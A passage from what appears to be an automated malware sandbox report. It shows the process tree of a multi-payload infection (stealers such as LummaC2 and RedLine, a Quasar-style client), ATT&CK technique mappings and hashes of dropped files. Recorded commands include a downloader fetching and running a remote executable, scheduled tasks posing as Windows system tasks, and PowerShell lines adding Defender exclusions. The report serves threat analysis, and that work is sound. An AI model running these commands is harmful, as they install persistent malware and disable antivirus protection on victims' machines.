    "C:\Users\Admin\AppData\Local\Temp\u698.1.exe"
    3⤵
    PID:2668
- C:\Users\Admin\AppData\Local\Temp\Files\redlinepanel.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\redlinepanel.exe"
  2⤵
  PID:4976
- C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe"
  2⤵
  PID:2496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\move.bat" "
    3⤵
    PID:8692
  - - C:\Users\Admin\AppData\Local\Temp\Files\Users.exe
      users.exe
      4⤵
      PID:9764
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 3
      4⤵
      Runs ping.exe
      PID:8836
- C:\Users\Admin\AppData\Local\Temp\Files\e0cbefcb1af40c7d4aff4aca26621a98.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\e0cbefcb1af40c7d4aff4aca26621a98.exe"
  2⤵
  PID:7356
- C:\Users\Admin\AppData\Local\Temp\Files\ISetup9.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ISetup9.exe"
  2⤵
  PID:7912
- - C:\Users\Admin\AppData\Local\Temp\u63s.0.exe
    "C:\Users\Admin\AppData\Local\Temp\u63s.0.exe"
    3⤵
    PID:8520
- - C:\Users\Admin\AppData\Local\Temp\u63s.1.exe
    "C:\Users\Admin\AppData\Local\Temp\u63s.1.exe"
    3⤵
    PID:1440
- C:\Users\Admin\AppData\Local\Temp\Files\RoulleteBotPro_x32-x64.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\RoulleteBotPro_x32-x64.exe"
  2⤵
  PID:7876
- C:\Users\Admin\AppData\Local\Temp\Files\Ljauypuypg.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Ljauypuypg.exe"
  2⤵
  PID:7280
- C:\Users\Admin\AppData\Local\Temp\Files\judith1234.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\judith1234.exe"
  2⤵
  PID:3652
- - C:\Users\Admin\AppData\Local\Temp\onefile_3652_133571332847719471\stub.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\judith1234.exe"
    3⤵
    PID:5628
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:6708
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:9092
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:8380
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
      4⤵
      PID:9104
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        5⤵
        
        PID:8208
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "gdb --version"
      4⤵
      PID:9116
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:9124
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:6196
- C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe"
  2⤵
  PID:7204
- - C:\Users\Admin\AppData\Local\Temp\Files\WEBDOWN.EXE
    "C:\Users\Admin\AppData\Local\Temp\Files\WEBDOWN.EXE" http://www.ojang.pe.kr/CALENDAR/DOWN/JEDITOR/JEDITOR.EXE "C:/Users/Admin/AppData/Local/Temp/Files/jeditor.exe" RUN
    3⤵
    PID:7688
- C:\Users\Admin\AppData\Local\Temp\Files\s1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\s1.exe"
  2⤵
  PID:1744
- C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe"
  2⤵
  PID:8892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
    3⤵
    PID:4708
- C:\Users\Admin\AppData\Local\Temp\Files\virus.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\virus.exe"
  2⤵
  PID:2856
- C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"
  2⤵
  PID:9200
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Windows System" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:8636
- C:\Users\Admin\AppData\Local\Temp\Files\koooooo.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\koooooo.exe"
  2⤵
  PID:8860
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:8252
- C:\Users\Admin\AppData\Local\Temp\Files\PrntScrnOfAMZOrderID.jpg.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\PrntScrnOfAMZOrderID.jpg.exe"
  2⤵
  PID:7616
- - C:\Users\Admin\AppData\Local\Temp\Files\PrntScrnOfAMZOrderID.jpg.exe
    C:\Users\Admin\AppData\Local\Temp\Files\PrntScrnOfAMZOrderID.jpg.exe u5
    3⤵
    PID:1172
  - - C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
      svchost.exe
      4⤵
      PID:4224
- C:\Users\Admin\AppData\Local\Temp\Files\i.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\i.exe"
  2⤵
  PID:8340
- C:\Users\Admin\AppData\Local\Temp\Files\inst77player_1.0.0.1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\inst77player_1.0.0.1.exe"
  2⤵
  PID:8924
- C:\Users\Admin\AppData\Local\Temp\Files\afile.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\afile.exe"
  2⤵
  PID:4248
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:9372
- C:\Users\Admin\AppData\Local\Temp\Files\LummaC2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\LummaC2.exe"
  2⤵
  PID:8312
- C:\Users\Admin\AppData\Local\Temp\Files\Doublepulsar-1.3.1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Doublepulsar-1.3.1.exe"
  2⤵
  PID:2092
- C:\Users\Admin\AppData\Local\Temp\Files\AUTOKEY.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\AUTOKEY.exe"
  2⤵
  PID:9972
- C:\Users\Admin\AppData\Local\Temp\Files\fund.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\fund.exe"
  2⤵
  PID:7460
- C:\Users\Admin\AppData\Local\Temp\Files\123p.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\123p.exe"
  2⤵
  PID:9692
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    PID:9768
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    PID:9256
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    PID:612
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    PID:9848
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "OBGPQMHF"
    3⤵
    - Launches sc.exe
    PID:3320

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3a8
1⤵
PID:5004

C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
1⤵
PID:5272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
1⤵
PID:5804

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"
1⤵
PID:4276

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:2196
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
  2⤵
  PID:3964
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Creates scheduled task(s)
    PID:3032

C:\ProgramData\common\JTPFKOXW.exe
C:\ProgramData\common\JTPFKOXW.exe
1⤵
PID:5340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  PID:6044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
  2⤵
  PID:5280

C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
1⤵
PID:4860
- C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
  "C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
  2⤵
  PID:7504

C:\ProgramData\common\JTPFKOXW.exe
C:\ProgramData\common\JTPFKOXW.exe
1⤵
PID:8952
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  PID:6968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
  2⤵
  PID:9348

C:\Users\Admin\AppData\Roaming\Eszop.exe
C:\Users\Admin\AppData\Roaming\Eszop.exe
1⤵
PID:9060

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -s BITS
1⤵
PID:9984

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -s BITS
1⤵
PID:10156

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Scripting

T1064

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe

Filesize
444KB

MD5
2d2ca48b8c09de0645b7fd0223c922f0

SHA1
de1f948065d612cd649564e466e362198f8ce3e6

SHA256
72e63f73ced48b29f196e48030215273a17f7827c310f2747321cbc1f388c206

SHA512
452f545f1f4d834a2cd92910fe5caa8c0f2ffdbaf2b3a0370c17f953422d37c13e10212219cae04fad93d07e81f370010a1951b29f2e83f78694ed68637d27bb

Download Submit
C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\CAAAAFBK

Filesize
92KB

MD5
1b7feb95d044831ae35bcc0801b08fd0

SHA1
831b33e4d7dd8206734bf32a85c763bcf71ef551

SHA256
d18acef73348d2a9021191839a515e1d89dc872023cd9ac2eca5512168962b68

SHA512
c0bcce218478fb4063c823d328666a4aa22f17476821d85fa2b5a391d24ea43474fee76f75c5e8446edc798e3f67ebde9953b280450fdf517242a0fe71b13d51

Download Submit
C:\ProgramData\KJKJJJECFIEBFHIEGHJDAFIDAK

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\Users\Admin\AppData\Local\251G6pBnAwbTKyogkdXeYWCd.exe

Filesize
6.5MB

MD5
80f87d66bd289d0b8221622263e58163

SHA1
7d38c9ab203315330e16a17554f9f010027f956a

SHA256
ec645c55110e6bc4559f15f04693f8d6b78a175b35e282a293349c9b80287d83

SHA512
7958a33d3443a539b0a9a79a0857b4f4211dcf76d1d652a829894b97dd555ef8060426294c4e2e29beb973ddfca3909dca9fcd39e97c7e1123ce33829ba3bc4d

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\CoinSurf.WPF.exe

Filesize
312KB

MD5
f2af5d1c111ee516d0ee51470dfbf299

SHA1
ce76ce7cd9aae406a495e680e98e9285927482be

SHA256
7d36de96b489ba8c5400b5c48f2d22fb380200edf42d6966ec43a00670d126f9

SHA512
5a425855384d96776b4a0645e0f85ac050591cc0746b329612dbf721ecf1c65438c4f0e55b3a9f294c128fe288975d87731ef94a10c2d5f92e7d567221589201

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\CoinSurf.WPF.exe

Filesize
304KB

MD5
e335b9d0a88b4336ba9faf41382bc0a4

SHA1
557cf165acc8f7c57142ceaeea743be3caaf58b7

SHA256
88eeb6c853ba6471ec4d59533cd348f237cb7a733f26bfaa52874ff03cbee6ab

SHA512
8d289b171d3cf4b622df853d715d5e7ce5db0c7a26c36a9c7e25a1cf81a77c8faa62f56dc25fcd4a93f536ee0606b305a1d6c158fb11b4a20964067a260fa572

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\csen.exe

Filesize
4.7MB

MD5
07c076cff310bc55c85a492d262e47df

SHA1
610afba8fcdf2c713ea3f0faba74b7c44c50f428

SHA256
e58cfcdc47f72b14903254a7c93704f4360cbaea69ccf8079c7d9997c834eb30

SHA512
203848805d01d3daffb27b6051eca14f9377e36cd006bfd90af9aef583f02a51192f1e79fa57737aaee7d9e62516e7cabadd81daca3efd39cfe96740ccb817e7

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\packages\CoinSurf.WPF-1.0.5-full.nupkg

Filesize
6.1MB

MD5
14639a7062b1468e2c702665600bbb44

SHA1
05394497fd76694432aa1519a65ba6b8cac2d3d1

SHA256
699da56d1a372958ce9c20c3ee97d8cd1071fdf4420bf9d8cf5a21d83d00ffbc

SHA512
75ba5e8d1500f7c31f897763234c7c76b7d5637d1672c1681ddaf8a43ea1d036f74279d29dd8152e3f467ae55220b148b5dcf56b49058c47de3023f23c1bbc3b

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\packages\CoinSurf.WPF-1.0.7-full.nupkg

Filesize
6.2MB

MD5
0eedb3eaf23f5d52bdef6ab4daa9ce44

SHA1
15bef62c3d6cab6bc2771bd77eb7564a85adc14a

SHA256
8d48ee0bb0ee1ca36b2127490b682ff846590117d3e3656258e5ac18ff39bbb7

SHA512
67febb7583cb5a488af1271ada20b4436997e32f68d176b233d5bf1fbb6515658664eca7ff2c8ec85498fff8bb8e7b44cb5b87f85c96fc5fd439ac9019fbc470

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\packages\RELEASES

Filesize
81B

MD5
6e53883dcc461c3f40be461613f9a3e5

SHA1
6f963dacfe384c8699cb93db4e7d2126b86209a2

SHA256
a4fa5be57f7b90ac2fae58799e313e4f9c12b31fdf4fdaed3e7078cd67470f39

SHA512
dcac88983a7e0191e1e7235e9ef6dde77aff236e34c2bf3bbe49981aa99fd62c5fcc371d3479d0fe4d190c8f202324ac8a6123cca12d1bbcd250b40b27529aa1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\mshthtr.exe

Filesize
417KB

MD5
40e76deb2066f8674c4b8276ab787ff2

SHA1
cc0b9b7d616f4b8338a74a5f44e2f65061f03009

SHA256
d2e4ef567c497136b0b0b75929ef07643296ca2814b6b0f19303ee29cb194cb1

SHA512
754cb821a36cfc227536e9e9271631a3c9e45b1c0976bbb53b6ee8820489a013f750edffb85e6554ab7b433d969e1036e3f67aeb59f2a77d5f62eaa5300003a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSE171.tmp\Install.exe

Filesize
3.0MB

MD5
618cefbbb42bce4c8af99385d8344987

SHA1
343163bbd696fb8f43476e03002a39f2eda4ef56

SHA256
2d402d1496c352a0e4895b9f6f14c333a9e4e480dea279ffc4c6b64843d1ec2f

SHA512
314d830890ae112a590010807f8a835a7c20a07a443e507874ea482b5f54ff51ccb329f1760b968509c173ef760b97fadda2275dc6a09c4e0e132c2a3098b344

Download Submit
C:\Users\Admin\AppData\Local\Temp\AITMP0\ailogo.ico

Filesize
21KB

MD5
044f9f53d150bdab3e7a7b5727181102

SHA1
c95c7c1a003eeff2c1b7222eca73cecea6ead949

SHA256
3342a6ed58e4e6fe6566c3f379346ac96fbb5819446d67bb4b88b67729f3772f

SHA512
369f999acc2c45ac784b7396a1287b9aedd02036e87b6397e01d23be9a5b5711578b9d07a65690e8aef2d081ef5cbd463f32ba6ed4f2ec692afd9c93c6b560ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\ISetup2.exe

Filesize
413KB

MD5
0519b278b624bc86376278205355d163

SHA1
d29bf131b735cbfa4a4cc0184e013a12c90cea80

SHA256
96fce38b0770ed265a22ba22258c9f81c0cd24d990f924a3891b0561dc53fb34

SHA512
284b76dd7e9512baf02acefe6eca92e11ca1a6f15769c9132f1a0ed582173eb599cc02dfe4a79e48063d338a2303cb53085f4908426b5c3527279591c5f6cc56

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\ISetup8.exe

Filesize
413KB

MD5
d9d1b9fc053d43c0394f18c4af08ec55

SHA1
30d90334d837c0d1c379b63bf9af7696a7a38ed2

SHA256
c623a8480cc9a85eab6a3cbd4c5683dbe3676de95f278b0c679a3dc46f608a65

SHA512
b452f13c38c41a1a7e21109a3aaa0d6bf70e89b2383603e1ef335c8be3fdffc651a4c91ab87fee142b7b8d76cce6c1f4a7a6d346a51b5337e8f47bfeb1d68058

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Mtkfarukc.exe

Filesize
23KB

MD5
3e2f66f617318069be60fe1c16ecdfd6

SHA1
7712d6f2c085ac2603a3701143e8ac71f7b3aa9e

SHA256
1cfbcd1f141c0199ba408b39fb9a178894c2bec3a05a64f961dc06f7939fabf3

SHA512
f111cddf1d2c4cb630a9dcc3cf6f3dfdea7eeac2e286080299011cdac18ee84c36e035807856461cb64b68262cc51cf0951b55bca5cace7361b6f7d835f3d0da

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\RDX.exe

Filesize
297KB

MD5
cc1e287519f78a28dab6bde8e1093829

SHA1
9262753386caa4054aa845d918364e964e5505aa

SHA256
dbcb61ce94c4d2d216de2b503937a2a964b984577f2d7730b7c6428b2b5e8db2

SHA512
527b6d905e2ca829369563baa7be9eaf4050ef9bbf438ccc98b9b821e76977aaebbda8471da8b81c0542395c5fc316b19d7034155f278640d0765bfc55dc1f43

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Tdkdsxz.exe

Filesize
4.0MB

MD5
673dd7435b21ae0bd9a753e8a3479d93

SHA1
939562bb513b604400bc53d7cd26915f8d378f46

SHA256
fdecb6d9df9205cb6f46e80d6a0dceff4fb65ec54e1768afbe6ad8116c5621ab

SHA512
a1d2f6e84c487438d0c3721a1815c786b62f33e6675205dfa32222c07a8fa80ab9537a8cba23ec21612f74005ff3ebb38d182761077fcc39f0700e98e132ee70

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\TeamFour.exe

Filesize
541KB

MD5
3b069f3dd741e4360f26cb27cb10320a

SHA1
6a9503aaf1e297f2696482ddf1bd4605a8710101

SHA256
f63bdc068c453e7e22740681a0c280d02745807b1695ce86e5067069beca533e

SHA512
bda58c074f7bd5171d7e3188a48cbdc457607ff06045e64a9e8e33fcb6f66f941d75a7bf57eb0ef262491622b4a9936342384237fa61c1add3365d5006c6d0d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Tinder%20Bot.exe

Filesize
2.6MB

MD5
88c8facd138c9f9ce9f81be8796a3ba1

SHA1
2166a4cf5f5a9a6c324e4a6c8e5812093b15cc99

SHA256
346eae7ef7ffed41c2f3f18beafe2bb6692a94323700f0cade748ba83e55eb34

SHA512
f984cddf2a0c78e2dfda727b00b3a0d285661e2172616b220382f2c83b972dc2a5c2a6ce6e9417dfb2dcff0f2e419a849b0a40b89965503c78edebd318740629

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\WEBDOWN.EXE

Filesize
105KB

MD5
71fb6e7399edece22128ad713c4c1c9c

SHA1
ebb1e16504ddd152e9d85e85c0097f7c78ce7b53

SHA256
b49df048c103c3694d3c79d6736c34fad3683cb8b4256da06f14b64e5c1d1839

SHA512
9565a1d42dcc0fb1121810db9a026c5f7e48d9c8f72214e8ae0030351679b0d66977b41c06f10e86e74aeecd90043c9db3f008aaa8fceb2a005eaf4d8b58c14b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe

Filesize
62KB

MD5
4aa5e32bfe02ac555756dc9a3c9ce583

SHA1
50b52a46ad59cc8fdac2ced8a0dd3fceeb559d5f

SHA256
8a9235655b1a499d7dd9639c7494c3664e026b72b023d64ea8166808784a8967

SHA512
a02cf44a9fd47cff1017bbccf1a20bb5df71afb9110cd10c96a40aa83e8aeaff898bef465d60572282b30087144794192882b998e278e3a03d8a7e5e24313756

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe

Filesize
1.4MB

MD5
04055601abbd16ec6cc9e02450c19381

SHA1
420bd7c7cad59f1b7cdd2c8a64282ef6f06cfe6e

SHA256
b7620bff5539ff22c251c32e62961beae4f5a91b0f6c73dde1a7da941b93fe13

SHA512
826c13cf6a37c561fb9052b3a0a7424df7d2fe424fe8c3783440c4483aa46a2cf1e4c275c7c080a130e178c7ac3221bb9224126ef4ab0bee38c24b12fa2a70ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\amad.exe

Filesize
2.7MB

MD5
221bde86c555118e43df5fb971190659

SHA1
85444e05832a97d1dec8b25bead079a2f775eee7

SHA256
6198e8da287ceee18021779072ba732a0fd3c63b8aa367e823c0f4fc3a3c4249

SHA512
116ee11b2e58958669766da943dcb5f3822214ab43a98514d5f8ee3d6f5026439d59c3eb9e02e0144bd42cc9f8bfa10c18bd77602696cc2979acfa317856c6cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\bc_memories_from_the_mcp.exe

Filesize
63KB

MD5
eef08365ee3d38dcf90a93c1a0817e64

SHA1
32a92c1beef6af07069924387a8bd069572eb83f

SHA256
484051fcf1d7f8de7084c7419cf49f65b85ab16642093d5c4249002e9e31a00c

SHA512
748479cf7d575a4b14f08a113989ffc79f14bdf49c453be04ef4bdeaaec347590d0661e08dc486329c1ec9119d4c6ffe3ee51430efe90283d1f89eada7d20304

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\cayV0Deo9jSt417.exe

Filesize
958KB

MD5
aa3cdd5145d9fb980c061d2d8653fa8d

SHA1
de696701275b01ddad5461e269d7ab15b7466d6a

SHA256
41376827ba300374727d29048920ca2a2d9f20b929e964098181981581e47af2

SHA512
4be32b5e9eaffa8d3f4cce515717faa6259373e8dbd258b9ebc2534fd0b62aaa7043093204e43627983fe332f63d8f998a90dc1cbb74f54a18c55f67e42a8a32

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe

Filesize
5.3MB

MD5
de08b70c1b36bce2c90a34b9e5e61f09

SHA1
1628635f073c61ad744d406a16d46dfac871c9c2

SHA256
432747c04ab478a654328867d7ca806b52fedf1572c74712fa8b7c0edb71df67

SHA512
18a30e480ce7d122cfad5a99570042e3bef9e1f9feda1f7be32b273a7248274285c65ac997c90d3d6a950a37b4ea62e6b928bfefc924187c90e32ea571bfd1f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe

Filesize
5.0MB

MD5
a3fb2b623f4490ae1979fea68cfe36d6

SHA1
34bec167e0f95ecc36761f77c93c1229c2c5d1f4

SHA256
3bc9c1d7f87f71c9e98fac63c2f10d2651f51848082a85d6b3550649e4289d56

SHA512
370b23364bcf8f07aa951c1c6a9d6b03b516db8fd7444d25087ad8071c54bb06fd50ce311a205e0770211167728d86516e934a39a606f0bf0c9fbdd13dca7912

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\new.exe

Filesize
6.4MB

MD5
8832a526a5d248f89a69fea69634bf37

SHA1
a7bff94cd795760f0ef820cc86dd06f3017a5952

SHA256
32a28c30c4a2bb265ea5f24609da950fb66613677b747083c590104649db77cd

SHA512
49548b11c8fb08e6994117a5635ae35627463c62b284a05cad9a52bffa5b2394ad2a3d66cb21b27ed616b79eed8b8371669ab7c70f0a8873a814698e1408d546

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\ps.exe

Filesize
459KB

MD5
1edba8a76c4a327f6e0b81e85c14ede6

SHA1
89b68d190315e6476b0a8b135e6e515ab931c10a

SHA256
72c3a786661ee9742cf1d0e3b99b89e976911ed87971695f08487cf42d7fc29d

SHA512
3347452e348f52a17a787574136d8d0fccc70511205e47bd2fdc546718b87d22f9280621bc5a849c6b5834e1226a453ccc1657ff34f63877f052713ca9710562

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\resources\CCCED631-6DA2-4060-9824-95737E64350C.ico

Filesize
5KB

MD5
93e4504d4c585cfda1979b37e75fe39a

SHA1
5d4296f36e878b263c5da6ad8abd6174e4dff5d8

SHA256
69aaab4b888c83b3f77d524313f9383d9edaa73e4af111a7a637e9f84a1609d7

SHA512
072638bee318f5e15af53cf3f9efd9156aa4836c40e8fb5f1f856706331cb11b528dfebe8e88713fc7146fefb1e66a614cff2f4e87676d886d2f09d945cbd1a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\resources\FDC2CCAB-E8F9-4620-91DD-B0B67285997C.ico

Filesize
1KB

MD5
74fdac19593602b8d25a5e2fdb9c3051

SHA1
81db52e9ad1be5946dffa3c89f5302633a7698d2

SHA256
f06ebef0b912b94d7e0af3915f2a6b6b64f74cb60bc8aaa1104c874761a0dee6

SHA512
8ffb507e46c99f1fede3f12c14998cd41afa8cfc5c815756343041f1bef6faf7ba4429cebeb87b0fb807d911f5516d235d5f893e519576b1fb675d25d025c21b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\soft.exe

Filesize
2.2MB

MD5
1836716b2f372522b52f865d74f59dc7

SHA1
f642a469e381c3ec8f3fc9d29b791baf2d654b63

SHA256
8bc73b56e4f82591734a80dfae67191e5fb269ccbe313635be904d9d9f85009f

SHA512
b855a1410b8b633088dab1925061d07b1c89160763c0ce70581397896cd45067c830e694176efb63e14e9bd7cec3685c8c1a66e1f454d5e1b2c6c3c17a117dd3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe

Filesize
65KB

MD5
3a71554c4a1b0665bbe63c19e85b5182

SHA1
9d90887ff8b7b160ffc7b764de8ee813db880a89

SHA256
9340551164eb763cd63db1f251b535dea497edfcf1eb46febcb642b1369f8595

SHA512
49c869db9a74c8054a477396c205685f41d4fe79ed1bb9088c1d528d7df8dfd1e251ec016939a0207484e6fd2f3338afad06b4f242c7fcb5d16d2293db16e772

Download Submit
